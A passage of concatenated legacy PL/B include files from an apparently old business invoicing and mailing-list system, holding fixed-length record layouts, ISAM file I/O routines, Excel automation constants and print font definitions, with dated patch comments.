. REC LENGTH: 227 FIXED. INDEX KEY : 1-4 (4 POSITION RTN#)
. AIM KEY : 50-94
.
. RElease 1.4 05Aug11 DLH added room for company & contact numbers preping for merge into company file
. RElease 1.3 24Apr07 DLH added file manager
. RElease 1.2 12April2007 DLH inactive byte
. RElease 1.1 19AUG98 ASH Y2K CONVERSION
..............................................................................
.
NRTNFILE IFILE KEYLEN=4,FIXED=236,UNCOMP,Name="NINRTN.isi|NINS1:502"
.NRTNFILE IFILE KEYLEN=4,FIXED=227,UNCOMP,Name="NINRTN.isi|NINS1:502"
NRTNNAME INIT "NINRTN|NINS1:502 "
NRTNFLE2 AFILE
NRTNFLE3 FILE FIXED=236
NRTNFLD DIM 7
NRTNFLD2 DIM 48
NRTNFLAG FORM 1
NRTNFLG2 FORM 1
NRTNFLG3 FORM 1
NRTNPATH FORM 1
NRTNLOCK FORM 1 0 or 1=File Locks, 3=Record Locks, 3=No Locks
.
...............................................................................
*
rtnvars list
RTNUM DIM 4 1-4 RETURN-TO NUMBER. **KEY**
.RTCNTCT DIM 25 5-29 RETURN-TO CONTACT NAME.
RTCNTCT DIM 45 5-49 RETURN-TO CONTACT NAME.
.RTCOMP DIM 25 30-54 RETURN-TO COMPANY NAME.
RTCOMP DIM 45 50-94 RETURN-TO COMPANY NAME.
RTADDR DIM 25 95-119 RETURN-TO ADDRESS.
RT2ADDR DIM 25 120-144 RETURN-TO ADDRESS2.
RTCITY DIM 15 145-159 RETURN-TO CITY.
RTSTATE DIM 2 160-161 RETURN-TO STATE.
RTZIP DIM 10 162-171 RETURN-TO ZIP.
RTCOUN DIM 15 172-186 RETURN-T0 COUNTRY CODE
RTNAME DIM 10 187-196 PASSWORD NAME
.RTREVDAT DIM 6 117-122 REVISED DATE.
RTREVDAT DIM 8 197-204 REVISED DATE.
.RTBLANK DIM 3 205-207 NOT-USED.
RTBLANK DIM 2 205-206 NOT-USED.
RTActive Dim 1 207-207 ' ','Y'=active 'N' = do not use
RTTELE DIM 10 208-217 TELEPHONE
RTFAX DIM 10 218-227 FAX NUMBER.
RTCOMPN Dim 6 228-233 Company number
RTCNTN Dim 3 233-236 Contact Number
listend
.
<file_sep>/include/NJSTCLIO.inc
; Last change: JD 15 Sep 1999 3:41 pm
..............................................................................
.
. NJSTCLIO INCLUSION
. NIN DETAIL ADJUSTMENT APPLICATION ROUTINE
.
. APPLIES ADJUSTMENT AMOUNTS TO COMPUTED AMOUNTS FROM THE NINVCALC
. ROUTINE IN THE NINVCLIO INCLUSION.
.
.patch 1.1 PLI Sep 2007
..............................................................................
.
NJSTCALC
. MOVE JSTAR TO CVTFLD
. CALL CVT
ADD jstar TO FAR
ADD jstar TO ARWOPP
.
. MOVE JSTAP1 TO CVTFLD
. CALL CVT
ADD jstap1 TO FAP1
ADD jstap1 TO AP
.
. MOVE JSTAP2 TO CVTFLD
. CALL CVT
ADD jstap2 TO FAP2
ADD jstap2 TO AP
.begin patch 1.1
ADD jstap3 TO FAP3
ADD jstap3 TO AP
Add JstXninc,Xninc
.end patch 1.1
.
. MOVE JSTLRINC TO CVTFLD
. CALL CVT
ADD jstlrinc to lRINC
ADD jstNINinc to NINC
.
. MOVE JSTSTAX TO CVTFLD
. CALL CVT
. ADD NUM102 TO STAX
. ADD NUM102 TO TAXES
.
. MOVE JSTCTAX TO CVTFLD
. CALL CVT
. ADD NUM102 TO CTAX
. ADD NUM102 TO TAXES
.
. MOVE JSTPOST TO CVTFLD
. CALL CVT
. ADD NUM102 TO POST
.
add jststax to taxes
add jststax to stax
.
. MOVE JSTCTAX TO CVTFLD
. CALL CVT
. ADD NUM102 TO CTAX
. ADD NUM102 TO TAXES
add jstctax to taxes
add jstctax to ctax
.
. MOVE JSTPOST TO CVTFLD
. CALL CVT
. ADD NUM102 TO POST
add jstpost to post
.
RETURN
.
CVT
. ENDSET CVTFLD CHECK LAST BYTE.
. RESET MPCHARS
. SCAN CVTFLD IN MPCHARS IS IT A MINUSOVRPNCH?
. GOTO CVTMP IF EQUAL YES.
. RESET CVTFLD NO.
. TYPE CVTFLD CHECK NUMERIC VALIDITY.
. GOTO CVTOK IF EQUAL ITS OK.
.FORMERR DISPLAY *P01:24,*EL,*B,"Format error in NJSTCALC. ",*W9
. MOVE B10 TO CVTFLD
. RETURN
.CVTMP REPLACE MPCHANGE IN CVTFLD CHANGE MP TO NUMBER.
. RESET CVTFLD
. TYPE CVTFLD VALID NUMERIC?
. GOTO FORMERR IF NOT EQUAL NO.
. MOVE CVTFLD TO NUM10 MOVE INTO NUMERIC.
. MULTIPLY "-1" BY NUM10 CHANGE TO MINUS.
. MOVE NUM10 TO CVTFLD MOVE BACK TO DIM.
.CVTOK MOVE CVTFLD TO NUM102
. MULTIPLY ".01" BY NUM102
RETURN
<file_sep>/include/XMGTIO.INC
..............................................................................
.
. xmgtIO INCLUSION
.
. FILE NAME : exchmgmt
..............................................................................
.
. ENTRY POINT : xmgtKEY
. REQUIRED : 'xmgtFLD', xmgtPATH
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
xmgtKEY
BRANCH xmgtFLAG TO xmgt1
CALL xmgtOPEN
xmgt1 FILEPI 1;xmgtFILE
READ xmgtFILE,xmgtFLD;xmgtvars
RETURN
.
..............................................................................
.
. ENTRY POINT : xmgtTST
. REQUIRED : xmgtFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
xmgtTST
BRANCH xmgtFLAG TO xmgt2
CALL xmgtOPEN
xmgt2 FILEPI 1;xmgtFILE
READ xmgtFILE,xmgtFLD;STR1
RETURN
.
..............................................................................
.
. ENTRY POINT : xmgtKS
. REQUIRED :
. RETURNED :
. DESCRIPTION : KEY SEQUENTIAL LIST-
.
xmgtKS
BRANCH xmgtFLAG TO xmgt3
CALL xmgtOPEN
xmgt3 FILEPI 1;xmgtFILE
READKS xmgtFILE;xmgtvars
RETURN
.
..............................................................................
.
. ENTRY POINT : xmgtSEQ
. REQUIRED :
. RETURNED : LIST-
. DESCRIPTION : SEQUENTIAL LIST-
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
xmgtSEQ
BRANCH xmgtFLAG TO xmgt4
CALL xmgtOPEN
xmgt4 FILEPI 1;xmgtFILE
READ xmgtFILE,SEQ;xmgtVARS
RETURN
.
..............................................................................
.
. ENTRY POINT : xmgtWRT
. REQUIRED : 'xmgtFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
xmgtWRT BRANCH xmgtFLAG TO xmgt5
CALL xmgtOPEN
xmgt5 FILEPI 1;xmgtFILE
WRITE xmgtFILE,xmgtFLD;xmgtVARS
RETURN
..............................................................................
.
. ENTRY POINT : xmgtUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE LIST-
.
xmgtUPD BRANCH xmgtFLAG TO xmgt6
CALL xmgtOPEN
xmgt6 FILEPI 1;xmgtFILE
UPDATE xmgtFILE;xmgtVARS
RETURN
..............................................................................
.
. ENTRY POINT : xmgtDEL
. REQUIRED : 'xmgtFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
xmgtDEL BRANCH xmgtFLAG TO xmgt7
CALL xmgtOPEN
xmgt7 FILEPI 1;xmgtFILE
DELETE xmgtFILE,xmgtFLD
RETURN
...............................................................................
.
. ENTRY POINT : xmgtOPEN
. REQUIRED : 'xmgtPATH'
. RETURNED : 'xmgtFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
xmgtOPEN
TRAP xmgtGONE GIVING ERROR IF IO
OPEN xmgtFILE,xmgtNAME
TRAPCLR IO
MOVE C1 TO xmgtFLAG
RETURN
.
.
xmgtGONE MOVE xmgtNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/excel.inc
.THIS IS A DEVELOPMENT FILE. NOT YET READY FOR PRIME TIME.
.Variant Types
VT_EMPTY EQU 0 .nothing
VT_NULL EQU 1 .SQL style null
VT_I2 EQU 2 .2 byte signed integer
VT_I4 EQU 3 .4 byte signed integer
VT_R4 EQU 4 .4 byte real - Float
VT_R8 EQU 5 .8 byte real - Double
VT_CY EQU 6 .Currency
VT_DATE EQU 7 .Date
VT_BSTR EQU 8 .OLE automation string
VT_DISPATCH EQU 9 .Idispatch FAR *
VT_ERROR EQU 10 .SCODE
VT_BOOL EQU 11 .Boolean - True = -1, False = 0
VT_VARIANT EQU 12 .VARIANT FAR *
VT_UNKNOWN EQU 13 .Unknown type
VT_UI1 EQU 17 .Unsigned character
books automation
book automation
sheets automation
sheet automation
ex automation class="Excel.Application"
.Variant objects used to talk to outside applications
xlRowHeight variant
Zoom80 variant
.Formatting vars
.Generic Variant objects useful in Excel
.Booleans
.PL/B does not have a Boolean datatype, so we have to create our own.
OTRUE variant
OFALSE variant
.Formatting vars needed
.This constant was found in the Object Browser in Excel under the Help topic for the
.HorizontalAlignment property of the Range object.
AlignCenter integer 4,"0xffffeff4"
AlignLeft integer 4,"0xffffefdd"
AlignRight integer 4,"0xffffefc8"
AllMargin variant
MedThick integer 4,"0xFFFFEFD6"
SheetsDefault integer 4,"0x00000000"
xlAlignCenter integer 4,"0xffffeff4"
xlColWidth variant
xlLandscape integer 4,"0x2" .2
xlMaximized integer 4,"0xFFFFEFD7"
xlMinimized integer 4,"0xFFFFEFD4"
xlPaperLegal integer 4,"0x5"
xlUnderlineStyleSingle integer 4,"0x2"
SReturn init 0x0a .soft return/line feed
LOText dim 100
range dim 20
range2 dim 20
.............................................................................................................
.Sample
. Book.PrintOut using *From=1, *To=1, *Copies=1, *Preview=0:
. *PrintToFile=0, *Collate=0
.............................................................................................................
//Boolean values, in reality, are expressed as follows:
//False = '0', True = anything other than '0', usually '-1'
create OTRUE,VarType=VT_BOOL,VarValue=1
create OFALSE,VarType=VT_BOOL,VarValue=0
<file_sep>/include/prtpagedd.INC
PRTPG24B Font
PRTPG24I Font
PRTPG12 Font
PRTPG12I Font
PRTPG12B Font
PRTPG10 Font
PRTPG10B Font
PRTPG10I Font
PRTPG9 Font
PRTPG9B Font
PRTPG9I Font
PRTPG6 Font
PRTPG85 Font
PRTPG7 Font
PRTPG9BI Font
PRTPGfont7 font
PRTPGfont8 font
PRTPGfont9 font
NINLogo PICT
NINLogoColorbox Pict
NINLogobox Pict
CopyRightS Init "©"
.
Laser PFILE
create PRTpg24B,"Times New Roman",size=24,Bold
create PRTpg24I,"Times New Roman",size=24,Italic
create PRTpg12,"Times New Roman",size=12
create PRTpg12B,"Times New Roman",size=12,Bold
create PRTpg12I,"Times New Roman",size=12,Italic
create PRTpg10,"Times New Roman",size=10
create PRTpg10B,"Times New Roman",size=10,Bold
create PRTpg10I,"Times New Roman",size=10,Italic
create PRTpg9,"Times New Roman",size=9
create PRTpg9B,"Times New Roman",size=9,Bold
create PRTpg9I,"Times New Roman",size=9,Italic
create PRTpg6,"Times New Roman",size=6
create PRTpg9BI,"Times New Roman",size=9,Bold,Italic
create PRTpg7,"Times New Roman",size=7
create PRTpg85,"Times New Roman",Size="8.5"
create PRTPGfont7,"Helvetica",size=12
; create PRTPGfont7,"Helvetica",size=14,bold
create PRTPGfont8,"Helvetica",size=14,italic
create PRTPGfont9,"Arial",size=12
move "750",column ;requires COns.inc
move "1750",column1 ;requires COns.inc
move "3000",column2 ;requires COns.inc
CREATE NINLogo=3:13:30:50:
"\\nins1\e\netutils\NIN logo black outline.jpg"
CREATE NINLogoColorbox=3:10:30:40:
"\\nins1\e\netutils\logo color box only.jpg"
CREATE NINLogobox=3:10:30:40:
"\\nins1\e\netutils\logo block Outline box.jpg"
<file_sep>/include/NInvBrkGIO.INC
..............................................................................
.
. NINVBRKGIO INCLUSION
. NIN Broker Guar letter log file
;. ............................................................................
;.
;. FILE: NINVBRKGuar
;. LENGTH: 33
;. COMPRESS: NONE
;. TYPE: ISAM
;. isi KEY: 01-06 INvoice # DUplicates allowed
;*******************************************************************************
;*patch 1.0 09Feb2004 DLH Broker Guar letter 1st release
;*******************************************************************************
..............................................................................
. ENTRY POINT : NINVBRKGKey
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : Isam READ
.
NINVBRKGKey BRANCH NINVBRKGFLAG TO NINVBRKG1
CALL NINVBRKGOPEN
NINVBRKG1 FILEPI 1;NINVBRKGFILE
READ NINVBRKGFILE,NinvBRKGfld;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGTST
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : Test Isam READ
.
NINVBRKGTST BRANCH NINVBRKGFLAG TO NINvBrkG2
CALL NINVBRKGOPEN
NINVBRKG2 FILEPI 1;NINVBRKGFILE
READ NINVBRKGFILE,NinvBRKGFLD;;
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGKS
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : Key SEQUENTIAL READ
.
NINVBRKGKS BRANCH NINVBRKGFLAG TO NinvBrkg3
CALL NINVBRKGOPEN
NINVBRKG3 FILEPI 1;NINVBRKGFILE
READKS NINVBRKGFILE;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGSEQ
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : SEQUENTIAL READ
.
NINVBRKGSEQ BRANCH NINVBRKGFLAG TO NinvBrkg4
CALL NINVBRKGOPEN
NINVBRKG4 FILEPI 1;NINVBRKGFILE
READ NINVBRKGFILE,SEQ;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGWrt
. REQUIRED :
. RETURNED : RECORD
. DESCRIPTION : Key WRite
.
NINVBRKGWRT BRANCH NINVBRKGFLAG TO NinvBrkg5
CALL NINVBRKGOPEN
NINVBRKG5 FILEPI 1;NINVBRKGFILE
WRite NINVBRKGFILE,NINVBRKGFLD;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGUpd
. REQUIRED : Previous valid read
. RETURNED : RECORD
. DESCRIPTION : Isam Update
.
NINVBRKGUPD BRANCH NINVBRKGFLAG TO NinvBrkg6
CALL NINVBRKGOPEN
NINVBRKG6 FILEPI 1;NINVBRKGFILE
Update NINVBRKGFILE;NinvBRKGINV:
NinvBRKGCC:
NinvBRKGyy:
NinvBRKGMM:
NinvBRKGDD:
NinvBRKGTime:
NinvBRKGLTR:
NinvBRKGFill
RETURN
..............................................................................
. ENTRY POINT : NINVBRKGDel
. REQUIRED : Previous valid read
. RETURNED :
. DESCRIPTION : Isam Delete
.
NINVBRKGdel BRANCH NINVBRKGFLAG TO NinvBrkg7
CALL NINVBRKGOPEN
NINVBRKG7 FILEPI 1;NINVBRKGFILE
Delete NINVBRKGFILE,NinvBRKGfld
RETURN
..............................................................................
.
. ENTRY POINT : NINVBRKGOPEN
. REQUIRED : 'NINVBRKGFLAG'
. RETURNED : 'NINVBRKGFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
..............................................................................
NINVBRKGOPEN TRAP NinvBrkGGONE IF IO
OPEN NINVBRKGFILE,NINVBRKGNAME
TRAPCLR IO
MOVE C1 TO NINVBRKGFLAG
RETURN
..............................................................................
NINVBRKGGONE MOVE NINVBRKGNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/njstdd.inc
..............................................................................
.
. NJSTDD INCLUSION
. NIN DETAIL ADJUSTMENT FILE DEFINITION
.
. FILE NAME : NADJUST
. REC LENGTH: 177 FIXED
. INDEX KEY : 119-124,140-141 (INVOICE#, SUB#)
.
.Patch 1.6 PLI
.PATCH 1.5 IP address of File Manager Changed
.PATCH 1.3 ADDED AAMFILE AND FILELIST
.begin patch 1.2 10Mar99 DLH
. qty & reason field added 06jun95. DLH
.
..............................................................................
.
.begin patch 1.2
.NJSTFILE IFILE KEYLEN=7,FIX=122,UNCOMP
.START PATCH 1.3 REPLACED LOGIC
.NJSTFILE IFILE KEYLEN=8,FIX=177,UNCOMP
.>Patch 1.5 Begin
NJSTLIST Filelist
.NJSTFILE IFILE KEYLEN=8,FIX=177,UNCOMP,Name="NADJUST.ISI|20.20.30.103:502 "
.begin patch 1.6
.NJSTFILE IFILE KEYLEN=8,FIX=177,UNCOMP,Name="NADJUST.ISI|NINS1:502 "
NJSTFILE IFILE KEYLEN=8,FIX=188,UNCOMP,Name="NADJUST.ISI|NINS1:502 "
.NJSTFLE2 AFILE FIX=177,Name="NADJUST.AAM|20.20.30.103:502 "
.NJSTFLE2 AFILE FIX=177,Name="NADJUST.AAM|NINS1:502 "
NJSTFLE2 AFILE FIX=188,Name="NADJUST.AAM|NINS1:502 "
.end patch 1.6
.NJSTFLE2 AFILE FIX=177,Name="NADJUST.AAM"
Filelistend
.END PATCH 1.3 REPLACED LOGIC
.end patch 1.2
NJSTFLSQ FILE
;NJSTNAME INIT "NADJUST "
.NJSTNAME INIT "NADJUST.ISI|20.20.30.103:502 "
NJSTNAME INIT "NADJUST.ISI|NINS1:502 "
.>Patch 1.5 End
.>Patch 1.4
NJSTNAMESEQ INIT "NADJUST "
.>Patch 1.4
.begin patch 1.2
.NJSTFLD DIM 7
NJSTFLD DIM 8
NJSTFLD1 DIM 9
.begin patch 1.2
NJSTFLAG FORM 1
NJSTFLG2 FORM 1
.
jstvars list
JSTBUSY DIM 1 001-001 BUSY BYTE and code 'J'
JSTSTAT DIM 1 002-002 STATUS '0 ORD P'
JSTMLR DIM 4 003-006 MAILER CODE
JSTLR DIM 6 007-012 LR#
JSTBILTO DIM 1 013-013 BILL-TO CODE
JSTPAYTO DIM 1 014-014 PAY-TO CODE
.begin patch 1.2
..JSTAR DIM 7 015-021 A/R ADJUSTMENT
.JSTAP1 DIM 7 022-028 A/P1 ADJUSTMENT
.JSTAP2 DIM 7 029-035 A/P2 ADJUSTMENT
.JSTFIL1 DIM 1 036-036
.JSTLRINC DIM 6 037-042 LR INCOME ADJUSTMENT
JSTAR form 9.2 015-026 A/R ADJUSTMENT
JSTAP1 form 9.2 027-038 A/P1 ADJUSTMENT
JSTAP2 form 9.2 039-050 A/P2 ADJUSTMENT
jstap3 form 9.2 051-062 A/P2 ADJUSTMENT
JSTLRINC form 9.2 063-074 LR INCOME ADJUSTMENT
JSTNININC form 9.2 075-086 NIN NON comm INCOME ADJUSTMENT
.end patch 1.2
JSTREUSE DIM 1 087-087 RE-USE/RUN CHARGE CODE
JSTCD DIM 1 088-088 CREDIT/DEBIT CODE
JSTCRCT DIM 1 089-089 CORRECT/ADDITIONAL BILL CODE
.begin patch 1.2
.JSTSTAX DIM 5 046-050 STATE TAX ADJUSTMENT
.JSTPOST DIM 4 051-054 POSTAGE ADJUSTMENT
.JSTCTAX DIM 5 055-059 CITY ADJUSTMENT
JSTSTAX form 5.2 090-097 STATE TAX ADJUSTMENT
JSTPOST form 5.2 098-105 POSTAGE ADJUSTMENT
JSTCTAX form 5.2 106-113 CITY ADJUSTMENT
.end patch 1.2
JSTREASN DIM 2 114-115 REASON CODE
JSTCNT DIM 3 116-118 CONTACT CODE
.begin patch 1.2
.JSTDATE DIM 6 071-076 ADJUSTMENT DATE
JSTINVNO DIM 6 119-124 INVOICE NUMBER
JSTDATE DIM 8 125-132 ADJUSTMENT DATE ccyymmdd
.JSTINVDT DIM 6 077-082 INVOICE DATE
.JSTSUBNO DIM 1 083-083 ADJUSTMENT AMENDMENT NUMBER
JSTINVDT DIM 8 133-140 INVOICE DATE ccyymmdd
JSTSUBNO DIM 2 141-142 ADJUSTMENT AMENDMENT NUMBER
.end patch 1.2
JSTISTAT DIM 1 143-143 INVOICE STATUS
.begin patch 1.2
.JSTFIL6 DIM 6 085-090
.jstqty dim 7 119-7 qty adjusted to ....
jstqty dim 9 144-152 qty adjusted to ....
.end patch 1.2
jstqrsn dim 25 153-177 reason for qty adjustment.
.begin patch 1.6
JSTXNINC form 9.2 178-188 NIN NON comm INCOME ADJUSTMENT
.end patch 1.6
listend
<file_sep>/include/nstedd.inc
..............................................................................
.
. NSTEDD INCLUSION
. NIN STATEMENT FILE
.
. FILE NAME : NINSTE
. REC LENGTH: 176
. INDEX KEY :
.
.patch 07Dec07 DLH 1.22 - Create Pl FIle
.patch 18mar04 Jd 1.21 - turned on steadjsw.
.patch 27apr99 DLH 1.2 - nininv y2k increased check date year
.revised 20Jan99 Patch #1.1 - NINORD Y2K, increased Mail Date Year
.revised 10mar95 add adjustment switch
.REVISED 27dec94 expanded client name field from 5 to 25.
.REVISED 28JUN94 ADD OWNER NUMBER & check date.
.revised 03FEB94 TO INCLUDE ORDER SALESPERSON #.
.revised 27apr93 to include broker/contact number
.revised 19apr93 filler was 4 now 3, outside guar code added,
. pulled from order.
..............................................................................
.
.Start Patch #1.1 - increased var
.NSTEFILE FILE FIX=155
.NSTEFILE FILE FIX=160
.End Patch #1.1 - increased var
.begin patch 1.2
NSTEFILE FILE FIX=176
.end patch 1.2
.begin patch 1.22
NSTEPFILE FILE FIX=176
.end patch 1.22
NSTENAME INIT "NINSTE|NINS1:502 "
NSTEFLAG FORM 1
.
stevars list
STECODE DIM 2 001-002 FILLER 'F0'
STEMLR DIM 4 003-006 MAILER NUMBER
STELR DIM 6 007-012 LR NUMBER
STEBILTO DIM 1 013-013 BILL-TO CODE.
STEINVNO DIM 6 014-019 INVOICE NUMBER
.Start Patch #1.1 - increased var
.STEINVDT DIM 6 020-025 INVOICE DATE (MMDDYY)
.STEAR DIM 8 026-033 A/R (NO DECIMAL)
STEINVDT DIM 8 020-027 INVOICE DATE (CCYYMMDD)
.begin patch 1.2
.STEAR DIM 9 028-036 A/R (NO DECIMAL)
STEAR form 10.2 028-040 A/R
.end patch 1.2
.End Patch #1.1 - increased var
STECNT DIM 3 041-043 MAILER CONTACT#
STEMLRPO DIM 12 044-055 MAILER PO
.Start Patch #1.1 - increased var
.STEAP1 DIM 7 049-055 A/P1 (NO DECIMAL)
.STEAP2 DIM 9 056-064 A/P2 (NO DECIMAL)
.STEMLDDT DIM 6 065-070 MAIL DATE (MMDDYY)
.begin patch 1.2
.STEAP1 DIM 9 052-060 A/P1 (NO DECIMAL)
.STEAP2 DIM 9 061-069 A/P2 (NO DECIMAL)
STEAP1 form 10.2 056-068 A/P1
STEAP2 form 10.2 069-081 A/P2
.end patch 1.2
STEMLDDT DIM 8 082-089 MAIL DATE (CCYYMMDD)
.End Patch #1.1 - increased var
STEGRNTE DIM 1 090-090 GUARANTEED PAYMENT CODE (*)
STELNAME DIM 35 091-125 LIST NAME
STEGUAR DIM 1 126-126 OUTSIDE GUARANTY. 19APR93 DLH
STEFIL3 DIM 3 127-129 filler 19apr93
STECNAME DIM 25 130-154 CLIENT NAME (FOR ALPHA SORTING)
stebrk dim 4 155-158 broker/consultant nnumber
stebrkct dim 3 159-161 " " contact number
STESLS10 DIM 1 162-162 TENS DIGIT SALESPERSON NUMBER
STESALES DIM 1 163-163 ONES DIGIT SALESPERSON NUMBER
STEOWN DIM 4 164-167 LIST OWNER NUMBER.
.steckdte dim 6 156-161 inv check paid date
steckdte dim 8 168-175 inv check paid date ccyymmdd
steadjsw dim 1 176-176 1=adjusted 2=adjusted shortpay 18mar04 jd
listend
<file_sep>/include/Nuseio.inc
...............................................................................
. .
.NUSEIO.INC - IO MODULE FOR DATABUS PORT/USER IDENTIFICATION. .
...............................................................................
. FILENAME: NINUSERS
. LENGTH: 45 FIXED
. ACCESS: ISI
. KEY : 1-3 (PORT NUMBER)
. 29-31 (TYPIST INITIALS)
..............................................................................
. patch 1.1 06SEP2005 ASH Added FileList logic - Rewrote ALL routines
.add call to trim plb 8.6 appears to have a problem with trailing blanks on nt4 machines
.REVISED 04FEB92
.CREATED 13 JUNE 90.
...............................................................................
.
. ENTRY POINT : NUSEKEY
. REQUIRED : 'NUSEFLD'
. RETURNED : USERS RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NUSEKEY
BRANCH NUSEPATH,NUSE1A,NUSE1C
NUSE1A
BRANCH NUSEFLAG,NUSE1B
CALL NUSEOPEN
NUSE1B
. FILEPI 1;NUSEFILE
READ NUSEFILE,NUSEFLD;NUSEVARS
RETURN
NUSE1C
BRANCH NUSEFLAG,NUSE1D
CALL NUSEOPEN
NUSE1D
. FILEPI 1;NUSEFLE2
READ NUSEFLE2,NUSEFLD2;NUSEVARS
RETURN
...............................................................................
.
. ENTRY POINT : NUSETST
. REQUIRED : NUSEFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
NUSETST
BRANCH NUSEPATH,NUSE2A,NUSE2C
NUSE2A
BRANCH NUSEFLAG,NUSE2B
CALL NUSEOPEN
NUSE2B
. FILEPI 1;NUSEFILE
READ NUSEFILE,NUSEFLD;;
RETURN
NUSE2C
BRANCH NUSEFLAG,NUSE2D
CALL NUSEOPEN
NUSE2D
. FILEPI 1;NUSEFLE2
READ NUSEFLE2,NUSEFLD2;;
RETURN
...............................................................................
.
. ENTRY POINT : NUSEKS
. REQUIRED :
. RETURNED : USERS RECORD
. DESCRIPTION : KEY SEQUENTIAL MAILER FILE READ
.
NUSEKS
BRANCH NUSEPATH,NUSE3A,NUSE3C
NUSE3A
BRANCH NUSEFLAG,NUSE3B
CALL NUSEOPEN
NUSE3B
. FILEPI 1;NUSEFILE
READKS NUSEFILE;NUSEVARS
RETURN
NUSE3C
BRANCH NUSEFLAG,NUSE3D
CALL NUSEOPEN
NUSE3D
. FILEPI 1;NUSEFLE2
READKS NUSEFLE2;NUSEVARS
RETURN
..............................................................................
.
. ENTRY POINT : NUSESEQ
. REQUIRED :
. RETURNED : USERS RECORD
. DESCRIPTION : SEQUENTIAL USER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NUSESEQ
BRANCH NUSEFLAG,NUSE4
CALL NUSEOPEN
NUSE4
. FILEPI 1;NUSEFILE
READ NUSEFILE,SEQ;NUSEVARS
RETURN
..............................................................................
.
. ENTRY POINT : NUSEWRT
. REQUIRED : 'NUSEFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NUSEWRT
BRANCH NUSEFLAG,NUSE5
CALL NUSEOPEN
NUSE5
FILEPI 1;NUSEFLIST
WRITE NUSEFLIST;NUSEVARS
RETURN
...............................................................................
.
. ENTRY POINT : NUSEUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE USER FILE
.
NUSEUPD
BRANCH NUSEFLAG,NUSE6
CALL NUSEOPEN
NUSE6
FILEPI 1;NUSEFLIST
UPDATE NUSEFLIST;NUSEVARS
RETURN
...............................................................................
.
. ENTRY POINT : NUSEDEL
. REQUIRED : 'NUSEFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NUSEDEL
BRANCH NUSEFLAG,NUSE7
CALL NUSEOPEN
NUSE7
FILEPI 1;NUSEFLIST
DELETE NUSEFLIST
RETURN
...............................................................................
.
. ENTRY POINT : NUSEOPEN
. REQUIRED : 'NUSEFLAG'
. RETURNED : 'NUSEFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN NINUSER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NUSEOPEN
TRAP NUSEGONE giving Error if IO
OPEN NUSEFLIST
trapclr IO
MOVE C1,NUSEFLAG
RETURN
.
NUSEGONE
MOVE NUSENAME TO FILENAME
CALL FILEGONE
.
..............................................................................<file_sep>/include/nshpdd.inc
..............................................................................
.
. NSHPDD INCLUSION
. NIN SHIPMENT FILE DEFINITION
.
. FILE NAME : NINSHP
. REC LENGTH: 136 FIXED
. INDEX KEY : 1-6 (LR NUMBER)
.
.PATCH 1.4 18JUN2005 DMB Changed IP address of File Manager
.PATCH 1.3 09May2003 ASH Added new fields
.PATCH 1.2 increased STrack 09Apr01 DLH
.PATCH 1.1 increased SQTY 10Jun99 ASH
.tracking number added 07oct98 DLh
.date converted 15Jul98 DLH
..............................................................................
.
NSHPFILE IFILE KEYLEN=6
.NSHPFILE IFILE KEYLEN=6,FIXED=136
.>Patch 1.4 Begin
.NSHPNAME INIT "NINSHP.ISI|20.20.30.103:502"
NSHPNAME INIT "NINSHP.ISI|NINS1:502"
.>Patch 1.4 End
NSHPFLD DIM 6
NSHPFLAG FORM 1
nshplock form 1 0 OR 1=filepi,2=recordlock, 3=no lock.
.
shpvars list
SLRNUM DIM 6 001-006 LR NUMBER
SINFO DIM 36 007-042 SHIPPING TEXT EXPLANATION
SCODE DIM 1 043-043 HOW SHIP INFO WAS RECEIVED (C,P,S,I,R,T,A,F,Z,X)
.SDATE DIM 6 044-049 SHIPMENT DATE mmddyy
SDATE DIM 8 044-051 SHIPMENT DATE ccyymmdd
SPOST DIM 4 052-055 SHIPPING COST
.START PATCH 1.1 - REPLACED LOGIC
.SQUANT DIM 7 056-062 SHIP QUANTITY
SQUANT DIM 9 056-064 SHIP QUANTITY
